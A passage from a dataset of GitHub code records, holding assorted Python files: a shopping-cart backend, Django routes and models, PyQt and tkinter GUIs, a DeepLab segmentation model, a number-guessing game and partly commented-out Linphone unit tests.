\"no such item in cart\"\n\t\t\n\n\telif input_json[\"event\"] == \"pay_item\":\n\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\tresponse_json[\"message\"] = \"cart error/do not exist\"\n\t\telse:\n\t\t\t# Loop cart item to be removed from inventory\n\t\t\tfor i in check_existing[\"cart\"]:\n\t\t\t\tinv_payload = i\n\t\t\t\tinv_payload[\"method\"] = \"update_qty\"\n\t\t\t\tcoll2 = used_db.product_inventory\n\t\t\t\tresponse_json = {}\n\t\t\t\tresponse_json = inventory_management(inv_payload, coll2, response_json)\n\t\t\t#query_temp = {key:val for key, val in dict_temp.items() if (key != 'time_out')}\n\t\t\t#coll.update_one(query_temp, {\"$set\": dict_temp})\n\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dt.datetime(dict_temp[\"last_modified\"]), \"payment_status\": 1}})\n\t\t\tresponse_json[\"payment\"] = \"item paid, inventory updated\"\n\n\telse:\n\t\tresponse_json[\"message\"] = \"error\"\n\n\treturn(response_json)\n\n\nif __name__== '__main__':\n\tprint(\"this is cart management function\")\n\n\n","repo_name":"md0798/Smart-Retail","sub_path":"Project-v2021-04-03-server-backend/cart_func.py","file_name":"cart_func.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"126237704","text":"# Author: Axel Antoine\n# https://axantoine.com\n\n# Loki, Inria project-team with Université de Lille\n# within the Joint Research Unit UMR 9189 CNRS-Centrale\n# Lille-Université de Lille, CRIStAL.\n# https://loki.lille.inria.fr\n\n# LICENCE: Licence.md\n\nfrom mycgal import *\n\ndef printPoint(p):\n\tprint(\"[%d,%d]\"%(p.x,p.y))\n\ndef printContour(c):\n\tfor p in c:\n\t\tprintPoint(p)\n\n\ns1 = Segment(Point(0,1),Point(6,1))\ns2 = Segment(Point(1,0),Point(1,6))\ns3 = Segment(Point(0,6),Point(6,0))\n\nsegments = VectorSegment()\nsegments.push_back(s1)\nsegments.push_back(s2)\nsegments.push_back(s3)\n\n\nregions = computeRegions(segments)\n\nfor region in regions:\n\tprintContour(region.contour)\n\t#print(region.holes)\n\n\n\n\n\n\n\n\n","repo_name":"LokiResearch/EsquisseBlender","sub_path":"wrapper_cgal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73098247527","text":"# -------------------- Python3 TLE, PyPy3 AC --------------------\n# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\nUP = 0\nDN = 1\n\n# ---------- Function ----------\ndef prime_factorization(num: int, state: int):\n div, sqrt = 2, int(num ** 0.5) + 1\n\n while div <= sqrt:\n if num % div: div += 1\n else:\n if state == UP: calculation[UP][div] += 1\n else: calculation[DN][div] += 1\n num //= div\n \n if num > 1:\n if state == UP: calculation[UP][num] += 1\n else: calculation[DN][num] += 1\n\n return\n\n# ---------- Main ----------\nnum = int(input())\ntext = list(input().rstrip().split())\n\nFLAG = UP\ncalculation = [[0] * 100001 for _ in range(2)]\n\nfor op in text:\n if op == \"0\": print(\"mint chocolate\"); exit()\n elif op == \"1\": continue\n elif op == \"*\": FLAG = UP\n elif op == \"/\": FLAG = DN\n else: prime_factorization(abs(int(op)), FLAG)\n \nfor i in range(2, 100001):\n if calculation[UP][i] < calculation[DN][i]:\n print(\"toothpaste\")\n break\nelse:\n print(\"mint chocolate\")\n \n# ---------- Comment ----------\n# eval(): RecursionError\n# sys.setrecursionlimit(35000): OverflowError\n# L36: int(op) > abs(int(op)) | WA\n# L33 
add | TLE\n# L40 calculation[DN][i] add | TLE\n# 2d list > 1d list | TLE\n# Refactoring: 1. using defaultdict\n#             2. all prime calculate first\n#             3. In prime_factorization() not one by one, jumping next prime","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_20302.py","file_name":"acmicpc_20302.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36780947047","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import homePage, eventPage, ownedTickets, singleTicket, eventTickets, marketplace\n\nurlpatterns = [\n    path(\"\", homePage.as_view(), name=\"home\"),\n    path(\"marketplace/\", marketplace.as_view(), name=\"marketplace\"),\n    path(\"event/\", eventPage.as_view(), name=\"event\"),\n    path(\"my-tickets/\", ownedTickets.as_view(), name=\"myTickets\"),\n    path(\"ticket//\", singleTicket.as_view(), name=\"single_ticket\"),\n    path(\"event//tickets\", eventTickets.as_view(), name=\"event_tickets\"),\n]\n","repo_name":"taleisa/Immutable-Ticketing","sub_path":"immutableTicketing/marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26328726022","text":"import json\nfrom pydantic import BaseModel\n\ndef BuildPotnetialRagerJson(PotentialRager):\n    json = {\n        \"playerName\": PotentialRager.playerName,\n        \"recordingID\": PotentialRager.recordingID,\n        \"reasons\": PotentialRager.reasons,\n        \"reports\": PotentialRager.reports,\n        \"game\": PotentialRager.game\n    }\n    return json\n\ndef BuildRagerJson(Rager):\n    json = {\n        \"playerName\": Rager.playerName,\n        \"reports\": Rager.reports,\n        \"game\": Rager.game\n    }\n    return json\ndef BuildAppealJson(appeal):\n    json = {\n        \"playerName\": appeal.playerName,\n        \"reasons\": appeal.reasons,\n        \"game\": appeal.game\n    }\n    return json\ndef BuildgetJson(get):\n    json = {\n        \"game\": get.game\n    }\n    return json\n\nclass PotentialRager(BaseModel):\n    playerName: str\n    recordingID: str\n    reasons: str\n    reports: int\n    game: str\n\nclass Rager(BaseModel):\n    playerName: str\n    reports: int\n    game: str\nclass Appeal(BaseModel):\n    playerName: str\n    reasons: str\n    game: str\n\nclass getRagers(BaseModel):\n    game: str\n\n\n","repo_name":"hjrandall/Predecessor-Rage-Finder-BE","sub_path":"JsonBuilder.py","file_name":"JsonBuilder.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4909600975","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_Emergente(object):\n    def setupUi(self, Emergente, texto):\n        Emergente.setObjectName(\"Emergente\")\n        Emergente.resize(267, 109)\n\n        icon = QtGui.QIcon()\n        icon.addPixmap(QtGui.QPixmap(\"icono.ico\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n        Emergente.setWindowIcon(icon)\n\n        self.centralwidget = QtWidgets.QWidget(Emergente)\n        self.centralwidget.setObjectName(\"centralwidget\")\n\n        self.texto = QtWidgets.QLabel(self.centralwidget)\n        self.texto.setGeometry(QtCore.QRect(20, 20, 231, 71))\n        font = QtGui.QFont()\n        font.setPointSize(16)\n        font.setBold(True)\n        font.setWeight(100)\n        self.texto.setFont(font)\n        self.texto.setAlignment(QtCore.Qt.AlignCenter)\n        self.texto.setObjectName(\"texto\")\n\n        Emergente.setCentralWidget(self.centralwidget)\n        self.statusbar = 
QtWidgets.QStatusBar(Emergente)\n        self.statusbar.setObjectName(\"statusbar\")\n        Emergente.setStatusBar(self.statusbar)\n\n        self.retranslateUi(Emergente, texto)\n        QtCore.QMetaObject.connectSlotsByName(Emergente)\n\n    def retranslateUi(self, Emergente, textoEmergente):\n        _translate = QtCore.QCoreApplication.translate\n        Emergente.setWindowTitle(_translate(\"Emergente\", \"Mensaje\"))\n        #self.texto.setText(_translate(\"Emergente\", \"Archivo codificado\\ncon éxito\"))\n        self.texto.setText(_translate(\"Emergente\", textoEmergente))\n\n    def escribir(self, texto):\n        # update the popup label text directly; no window reference is available in this scope\n        print(texto)\n        self.texto.setText(texto)\n\n","repo_name":"David-alzate/Programacion","sub_path":"python/Ejemplos Python/Ejemplo Ventana Emergente-20230901/emergente.py","file_name":"emergente.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38001378415","text":"import tkinter as tk\r\nimport webbrowser\r\nimport notes as n\r\nimport links_library as ll\r\nimport gpa_calculator as avg\r\n\r\n#Functions to call the modules\r\ndef press_button_one(): \r\n    ll.window_one()\r\n\r\n\r\ndef press_button_two():\r\n    avg.window_two()\r\n\r\n\r\ndef press_button_three():\r\n    n.window_three()\r\n\r\n#Link to repository\r\ndef press_button_four():\r\n    webbrowser.open(r'https://github.com/LukasJurc/toolkit')\r\n    \r\n# Creation of the user interface\r\nmain = tk.Tk()\r\nmain.geometry(\"400x60\")\r\nmain.resizable(0,0)\r\nmain.title(\"GPB Tools\")\r\nmain_label = tk.Label(main, text=\"Wählen Sie Ihr Programm\")\r\nmain_label.pack()\r\n\r\nbutton_one = tk.Button(main, text=\"Linkbibliothek\", command = press_button_one)\r\nbutton_one.place(x=20, y=25, width=80, height=30)\r\n\r\n\r\nbutton_two = tk.Button(main, text=\"Durchschnitt\", command = press_button_two)\r\nbutton_two.place(x=110, y=25, width=80, height=30)\r\n\r\n\r\nbutton_three = tk.Button(main, text=\"Notizen\", command = press_button_three)\r\nbutton_three.place(x=200, y=25, width=80, height=30)\r\n\r\n\r\nbutton_four = tk.Button(main, text=\"Über uns\", command = press_button_four)\r\nbutton_four.place(x=290, y=25, width=80, height=30)\r\n\r\n\r\nmain.mainloop() \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LukasJurc/toolkit","sub_path":"start_program.py","file_name":"start_program.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6879154524","text":"import uuid\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db import models\n\nfrom core.mixins import BaseModel\n\n\nclass EventSecurityLayer(BaseModel):\n    event = models.ForeignKey(\n        'event.Event',\n        on_delete=models.CASCADE\n    )\n    security_layer = models.ForeignKey(\n        'event.SecurityLayer',\n        on_delete=models.CASCADE,\n    )\n    level = models.PositiveIntegerField()\n\nclass EventSecurityLayerMember(BaseModel):\n    event_security_layer = models.ForeignKey(\n        'event.EventSecurityLayer',\n        on_delete=models.CASCADE,\n        related_name='members',\n    )\n    member = models.ForeignKey(\n        'event.EventTeamMember',\n        on_delete=models.CASCADE,\n        related_name='event_security_layers',\n    )\n\n    def previous_security_layer_level(self):\n        from event.services import previous_event_security_layer\n        return previous_event_security_layer(self.event_security_layer)\n\nclass SecurityLayer(BaseModel):\n    # id = models.UUIDField(\n    #     default=uuid.uuid4, \n    #     primary_key=True, \n    #     
editable=False,\n # unique=True,\n # verbose_name=\"Id\"\n # )\n name = models.CharField(\n max_length=100,\n verbose_name=_('Name'),\n )\n organizer = models.ForeignKey(\n 'event.Organizer',\n on_delete=models.CASCADE\n )\n\nclass SecurityLayerMember(BaseModel):\n security_layer = models.ForeignKey(\n SecurityLayer,\n on_delete=models.CASCADE,\n related_name='security_layer_members'\n )\n member = models.ForeignKey(\n 'event.TeamMember',\n on_delete=models.CASCADE,\n related_name='security_layers' \n )","repo_name":"5no0p/scan-worker","sub_path":"event/models/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40731572439","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\nfrom modeling.maspp import build_maspp\nfrom modeling.decoder_maspp import build_decoder\nfrom modeling.backbone import build_backbone\n\nclass DeepLab(nn.Module):\n # def __init__(self, backbone='resnet', output_stride=16, num_classes=21,\n # sync_bn=True, freeze_bn=False):\n def __init__(self, backbone='resnet', output_stride=16, num_classes=8,\n sync_bn=True, freeze_bn=False):\n super(DeepLab, self).__init__() # 自己搭建的网络Deeplab会继承nn.Module:\n if backbone == 'drn': # 深度残差网络\n output_stride = 8 # 卷积输出时缩小的倍数 224/7=32\n\n if sync_bn == True:\n BatchNorm = SynchronizedBatchNorm2d # 每层进行归一化处理\n else:\n BatchNorm = nn.BatchNorm2d # 数据的归一化处理 y = \\frac{x - \\mathrm{E}[x]}{ \\sqrt{\\mathrm{Var}[x] + \\epsilon}} * \\gamma + \\beta\n\n self.backbone = build_backbone(backbone, output_stride, BatchNorm) # 'resnet' 16 BatchNorm2d\n self.maspp = build_maspp(backbone, output_stride, BatchNorm)\n self.decoder = build_decoder(num_classes, backbone, BatchNorm)\n\n self.freeze_bn = freeze_bn\n\n # MASPP+注意力模块\n def forward(self, input): # aspp->maspp\n [x1, x2, x3, x4] = self.backbone(input) # resnet:x4:[4,2048,32,32] x3:[4,1024,32,32] x2:[4,512,64,64] x1:[4,256,128,128]\n maspp = self.maspp(x4) # [4,256,32,32]\n\n x = self.decoder(maspp, x4, x3, x2, x1) # [4,8,128,128]\n # 最后进行4倍上采样\n x = F.interpolate(x, size=input.size()[2:], mode='bilinear', align_corners=True) # 4倍上采样 ->[4,8,512,512]\n\n return x\n\n def freeze_bn(self):\n for m in self.modules():\n if isinstance(m, SynchronizedBatchNorm2d):\n m.eval()\n elif isinstance(m, nn.BatchNorm2d):\n m.eval()\n\n def get_1x_lr_params(self):\n modules = [self.backbone]\n for i in range(len(modules)):\n for m in modules[i].named_modules():\n if self.freeze_bn: # freeze_bn=false\n if isinstance(m[1], nn.Conv2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n else:\n if isinstance(m[1], nn.Conv2d) or isinstance(m[1], SynchronizedBatchNorm2d) \\\n or isinstance(m[1], nn.BatchNorm2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n\n def get_10x_lr_params(self):\n modules = [self.maspp, self.decoder]\n for i in range(len(modules)):\n for m in modules[i].named_modules():\n if self.freeze_bn:\n if isinstance(m[1], nn.Conv2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n else:\n if isinstance(m[1], nn.Conv2d) or isinstance(m[1], SynchronizedBatchNorm2d) \\\n or isinstance(m[1], nn.BatchNorm2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n\nif __name__ == \"__main__\":\n # model = DeepLab(backbone='mobilenet', output_stride=16)\n model = DeepLab(backbone='resnet', output_stride=16)\n model.eval() # 
不启用 BatchNormalization 和 Dropout,保证BN和dropout不发生变化\n input = torch.rand(1, 3, 512, 512)\n output = model(input)\n print(output.size())\n","repo_name":"LHY-huiyin/Semantic-Segmentation","sub_path":"newmodeling/structure/deeplab_maspp.py","file_name":"deeplab_maspp.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31261284868","text":"from random import randint\r\nfrom time import sleep\r\nimport os\r\n\r\n# Evitar el cartel de bienvenida de la librería pygame\r\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\r\nfrom pygame import mixer\r\nmixer.init()\r\nSILVATO = mixer.Sound(\"sonidos/start.ogg\")\r\nWINNER = mixer.Sound(\"sonidos/winner.ogg\")\r\nLOOSER = mixer.Sound(\"sonidos/looser.ogg\")\r\nNEXT = mixer.Sound(\"sonidos/next.ogg\")\r\n\r\nclass Configuraciones():\r\n\tdef __init__(self):\r\n\t\tself.colores = [\"negro\", \"azul\", \"verde\", \"agua\", \"rojo\", \"morado\", \"amarillo\", \"blanco\", \"gris\"]\r\n\t\tself.num_max = None\r\n\t\tself.rondas = None\r\n\t\tself.ronda = 1\r\n\t\tself.fondo = None\r\n\t\tself.letras = None\r\n\t\tself.jugador = None\r\n\t\tself.dificultad = None\r\n\t\tself.init()\r\n\r\n\tdef init(self):\r\n\t\tself.jugador = input(\"Hola. Por favor escribe tu nombre y pulsa intro\")\r\n\t\twhile True:\r\n\t\t\tprint(f\"Bienvenido {self.jugador}!\\nEs momento de personalizar un poco el aspecto de el fondo y las letras. Comencemos por el fondo, y luego las letras.\\nEscribe el color que quieras y al finalizar pulsa intro. Los colores disponibles son:\")\r\n\t\t\tfor color in self.colores:\r\n\t\t\t\tprint(color)\r\n\t\t\tfondo = input(\"ingresa el color de fondo\")\r\n\t\t\tif fondo in self.colores:\r\n\t\t\t\tcaracteres = input(\"Ahora ingresa el color de los caracteres\")\r\n\t\t\t\tif caracteres in self.colores:\r\n\t\t\t\t\tos.system(f\"color {self.colores.index(fondo)}{self.colores.index(caracteres)}\")\r\n\t\t\t\t\tprint(f\"perfecto. Has seleccionado el fondo {fondo}, y el color {caracteres} para los caracteres\")\r\n\t\t\t\t\tbreak\r\n\t\tself.seleccionar_dificultad()\r\n\r\n\tdef seleccionar_dificultad(self):\r\n\t\twhile True:\r\n\t\t\tself.dificultad = input(\"Ahora es el turno de la dificultad. Ingresa el número de opción y pulsa intro:\\n1 Facilona\\n2 Solo para valientes\\n3 ¡imposible!\")\r\n\t\t\tif self.dificultad == \"1\":\r\n\t\t\t\tself.num_max = 20\r\n\t\t\t\tself.rondas = 6\r\n\t\t\t\tprint(\"Has seleccionado la opción 1. A ver como te va con la facilona...\")\r\n\t\t\t\tbreak\r\n\t\t\telif self.dificultad == \"2\":\r\n\t\t\t\tself.num_max = 50\r\n\t\t\t\tself.rondas = 7\r\n\t\t\t\tprint(\"¡Apa! Aquí tenemos a alguien valiente. Mucha suerte...\")\r\n\t\t\t\tbreak\r\n\t\t\telif self.dificultad == \"3\":\r\n\t\t\t\tself.num_max = 100\r\n\t\t\t\tself.rondas = 8\r\n\t\t\t\tprint(\"!Atención! Una personita intrépida que se le anima al imposible. A cruzar los dedos...\")\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Has ingresado un valor incorrecto. 
Vuelve a intentarlo\")\r\n\t\tself.rand = randint(1, self.num_max)\r\n\t\tsleep(1.8)\r\n\t\tmixer.music.stop()\r\n\t\tSILVATO.play()\r\n\t\tsleep(1)\r\n\r\nclass Juego():\r\n\r\n\tdef __init__(self):\r\n\t\tmixer.music.load(\"sonidos/init.ogg\")\r\n\t\tmixer.music.play(-1)\r\n\t\tprint(\"¡Adivinador!\")\r\n\t\tsleep(2)\r\n\t\tself.configuraciones = Configuraciones()\r\n\t\tself.start()\r\n\r\n\tdef start(self):\r\n\t\tmixer.music.load(\"sonidos/background.ogg\")\r\n\t\tmixer.music.play(-1)\r\n\t\tmixer.music.set_volume(0.2)\r\n\t\twhile self.configuraciones.ronda <= self.configuraciones.rondas:\r\n\t\t\tself.rondas()\r\n\t\t\ttry:\r\n\t\t\t\tusuario = int(input())\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Valor incorrecto\")\r\n\t\t\t\tcontinue\r\n\t\t\tif usuario < 1 or usuario > self.configuraciones.num_max:\r\n\t\t\t\tprint(\"Fuera de rango\")\r\n\t\t\t\tcontinue\r\n\t\t\tif usuario == self.configuraciones.rand:\r\n\t\t\t\tself.winner()\r\n\t\t\t\tbreak\r\n\t\t\telif usuario > self.configuraciones.rand:\r\n\t\t\t\tif self.configuraciones.ronda < self.configuraciones.rondas:\r\n\t\t\t\t\tprint(\"nops..d. 😳. Es un número menor\")\r\n\t\t\telif usuario < self.configuraciones.rand:\r\n\t\t\t\tif self.configuraciones.ronda < self.configuraciones.rondas:\r\n\t\t\t\t\tprint(\"nops... 😳. Es un número mayor...\")\r\n\t\t\tself.configuraciones.ronda+=1\r\n\t\t\tNEXT.play()\r\n\t\tself.looser()\r\n\r\n\tdef winner(self):\r\n\t\tprint(\"¡Cooooorrecto! 🫂 🥳\")\r\n\t\tmixer.music.stop()\r\n\t\tWINNER.play()\r\n\t\tsleep(6)\r\n\t\tprint(f\"Felicitaciones {self.configuraciones.jugador}. Has ganado en la ronda {self.configuraciones.ronda}\")\r\n\t\tsleep(2)\r\n\t\tself.finish(\"Victoria\")\r\n\r\n\tdef looser(self):\r\n\t\tmixer.music.stop()\r\n\t\tLOOSER.play()\r\n\t\tsleep(2.5)\r\n\t\tprint(f\"😥. El número secreto era el {self.configuraciones.rand}. Has perdido el juego {self.configuraciones.jugador}. Otra vez será!\")\r\n\t\tsleep(3)\r\n\t\tself.finish(\"Derrota\")\r\n\r\n\tdef finish(self, estado):\r\n\t\twith open(\"historial.txt\", \"a\") as file:\r\n\t\t\tfile.write(f\"jugador: {self.configuraciones.jugador}- Resultado: {estado}- dificultad: {self.configuraciones.dificultad}- rondas: {self.configuraciones.ronda}\\n\")\r\n\t\tprint(\"Gracias por jugar\")\r\n\t\tsleep(1.5)\r\n\t\texit()\r\n\r\n\tdef rondas(self):\r\n\t\tif self.configuraciones.ronda == 1:\r\n\t\t\tprint(f\"¡Que comience el juego!. El número que debes adivinar está entre 1 y {self.configuraciones.num_max}. Cuál es tu apuesta? Tienes {self.configuraciones.rondas} oportunidades\")\r\n\t\telif self.configuraciones.ronda == self.configuraciones.rondas:\r\n\t\t\tprint(\"¡última oportunidad! 😨\")\r\n\t\telse:\r\n\t\t\tprint(f\"ronda {self.configuraciones.ronda}\")\r\n\r\nJuego()","repo_name":"GerardKessler/adivinador","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3300596350","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\n__author__ = \"Julien Barreau\"\n__copyright__ = \"(C) 2014 by MHComm. 
All rights reserved\"\n__email__ = \"info@mhcomm.fr\"\n\n# -----------------------------------------------------------------------------\n# Imports\n# -----------------------------------------------------------------------------\nimport logging\nimport os\nimport time\n\nif True:\n from unittest import TestCase\nelse:\n class TestCase(object):\n pass\n\nimport unittest\nfrom nose.plugins.attrib import attr\nimport xmlrpclib\n\nfrom wrappers.bd_linphone_wrapper import MHLinphoneWrapper\nfrom wrappers.common import ControlMessage\nfrom lp_config import LPConfig\n# -----------------------------------------------------------------------------\n# Globals\n# -----------------------------------------------------------------------------\nlogger = logging.getLogger(__name__)\n\ndef isnotdev():\n return os.environ.get('DEV') != 'JULIEN'\n\n# def skipifnotdev(*args, **kwargs):\n# return unittest.skipIf(os.environ.get('DEV') != 'JULIEN', *args, **kwargs)\n\nclass LPBaseTest(TestCase):\n \"\"\"\n Base class for tests mhlinphone_wrapper\n \"\"\"\n wrapper = None\n ref_count = 0\n @classmethod\n def setUpClass(cls):\n \"\"\" setUp method for tests in this class \"\"\"\n logger.debug(\"----*---- setupclass %r\", cls)\n TestCase.setUpClass()\n\n logger.debug('in SetUpClass, refcnt : %d', LPBaseTest.ref_count)\n if not LPBaseTest.wrapper:\n LPBaseTest.wrapper = MHLinphoneWrapper(\n rc_config_file=os.path.join(LPConfig.get_default_lp_data_dir(),\n \"unit_test.linphonerc\")\n )\n\n LPBaseTest.wrapper.init()\n if LPBaseTest.wrapper.proxy_enable:\n if not LPBaseTest.wrapper.is_ready_to_call():\n server = LPBaseTest.wrapper.wait_for_registered(20)\n assert server is not None\n LPBaseTest.ref_count += 1\n\n @classmethod\n def tearDownClass(cls):\n \"\"\" tearDown method for tests in this class \"\"\"\n logger.debug('in tearDownClass, refcnt : %d', LPBaseTest.ref_count)\n LPBaseTest.ref_count -= 1\n logger.debug(\"----*---- tearDown class %r\", cls)\n if LPBaseTest.ref_count == 0:\n TestCase.tearDownClass()\n logger.info(\"killing linphone\")\n LPBaseTest.wrapper.exit()\n LPBaseTest.wrapper = None\n\n@attr(needs_nothing=True)\nclass LPSimpleTest(LPBaseTest):\n \"\"\"\n Simple tests class for mhlinphone_wrapper\n \"\"\"\n\n def test_01_launch(self):\n \"\"\" if linphone is ready \"\"\"\n LPBaseTest.wrapper.is_running()\n\n self.assertTrue(LPBaseTest.wrapper.is_running(),\n msg=\"linphone core not running\")\n\n def test_02_camera_exists(self):\n \"\"\" if linphone have connected camera \"\"\"\n LPBaseTest.wrapper.get_status()\n cams = LPBaseTest.wrapper.webcam()\n\n self.assertTrue(len(cams) >= 1, \"system doesn't have webcam\")\n\n def test_03_use_camera(self):\n \"\"\" if linphone can use a camera \"\"\"\n cams = LPBaseTest.wrapper.webcam()\n prefered = None\n all_cams = []\n for cam in cams:\n all_cams.append(cam)\n if \"Logitech HD Pro Webcam C920\" in cam:\n prefered = cams.index(cam)\n\n if prefered:\n cam = prefered\n else:\n cam = 0\n\n LPBaseTest.wrapper.webcam(cam)\n\n used_webcam = LPBaseTest.wrapper.get_used_webcam()\n logger.debug(\"cam : %r, used cam : %r\", cams[cam], used_webcam)\n\n self.assertTrue(cams[cam] in used_webcam)\n\n\nclass ComLPTest(object):\n# class ComLPTest(LPBaseTest):\n \"\"\"\n Test class for on communication mhlinphone_wrapper\n without call tests\n \"\"\"\n# config = None\n# remote_sip_addr = None\n# local_sip_addr = None\n# remote_linphone = None\n#\n# @classmethod\n# def setUpClass(cls):\n# \"\"\" setUp method for tests in this class \"\"\"\n# LPBaseTest.setUpClass()\n# 
logger.debug(\"----*---- setupclass %r\", cls)\n# cls.config = LPConfig(LPConfig.get_default_lp_config())\n#\n# rpc_addr = cls.config.get(\"test.address\")\n# rpc_port = cls.config.get(\"test.port\")\n#\n# cls.remote_sip_addr = cls.config.get(\"test.remote_sip_addr\")\n# logger.debug('-|-|-| remote_sip_addr : %r', cls.remote_sip_addr)\n# cls.local_sip_addr = cls.config.get(\"local_sip_addr\")\n# logger.debug('-|-|-| local_sip_addr : %r', cls.local_sip_addr)\n#\n# cls.remote_linphone = xmlrpclib.ServerProxy('http://%s:%s/MH_LP' %\n# (rpc_addr, str(rpc_port)),\n# allow_none=True,\n# )\n#\n# logger.debug('--- remote: '+str(cls.remote_linphone.is_running())+\n# ' --- local: '+str(LPBaseTest.wrapper.is_running())+ ' --- '+\n# str(cls.__class__))\n#\n# if not cls.remote_linphone.is_running():\n# cls.remote_linphone.init()\n# cls.remote_linphone.wait_for_registered()\n#\n#\n# @attr(needs_rmt_lp=True, needs_net=True)\nclass ChatTest(object):\n pass\n# class ChatTest(ComLPTest):\n#\n# def test_01_com(self):\n# \"\"\" remote linphone is running \"\"\"\n# self.assertTrue(self.remote_linphone.is_running())\n# self.assertTrue(LPBaseTest.wrapper.is_running())\n#\n# def test_02_chat(self):\n# \"\"\" sip message \"\"\"\n# # time.sleep(3)\n# LPBaseTest.wrapper.send_message(\"msg1\", self.remote_sip_addr)\n#\n# ret = self.remote_linphone.wait_for_message(15)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n# sender, msg = ret\n# logger.debug(\"sender : %r, msg : %r, local addr : %r\",\n# sender, msg, LPBaseTest.wrapper.identity)\n#\n# self.assertEqual(sender, LPBaseTest.wrapper.identity,\n# \"not same sender\")\n# self.assertEqual(msg, \"msg1\", \"not same message\")\n#\n#\n# @attr(needs_rmt_lp=True)\n# @attr(needs_cam=True, needs_net=True)\nclass OnCallLPTest(object):\n# class OnCallLPTest(ComLPTest):\n \"\"\" Test class for on call mhlinphone_wrapper \"\"\"\n# def setUp(self):\n# \"\"\" setup method for call tests \"\"\"\n# logger.debug(\"----*---- setup %r\", self)\n# ComLPTest.setUp(self)\n#\n# logger.info(\"calling %r\", self.remote_sip_addr)\n# LPBaseTest.wrapper.call(self.remote_sip_addr)\n#\n# logger.debug(\"waiting for remote incoming\")\n# ret = self.remote_linphone.wait_for_incoming(15)\n# self.assertIsNotNone(ret, \"rpc wait for incoming call fail\")\n#\n# logger.debug(\"remote incoming call wait\")\n# self.remote_linphone.answer()\n#\n# ret = self.remote_linphone.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"rpc wait for answered call fail\")\n#\n# ret = LPBaseTest.wrapper.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"wait for answered call fail\")\n#\n# LPBaseTest.wrapper.get_status()\n#\n# def tearDown(self):\n# \"\"\" tearDown method for call tests \"\"\"\n# logger.debug(\"----*---- tearDown %r\", self)\n# ComLPTest.tearDown(self)\n#\n# if LPBaseTest.wrapper.is_in_call():\n# LPBaseTest.wrapper.terminate_call()\n#\n# ret = LPBaseTest.wrapper.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n# ret = self.remote_linphone.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n# else:\n# logger.warning(\"linphone should be on call, it isn't\")\n# LPBaseTest.wrapper.terminate_call()\n#\n#\n# def test_01_call(self):\n# \"\"\" if linphone is on call \"\"\"\n# time.sleep(3) # 5seconds call\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# def test_02_snapshot(self):\n# \"\"\" if linphone can take snapshot \"\"\"\n# 
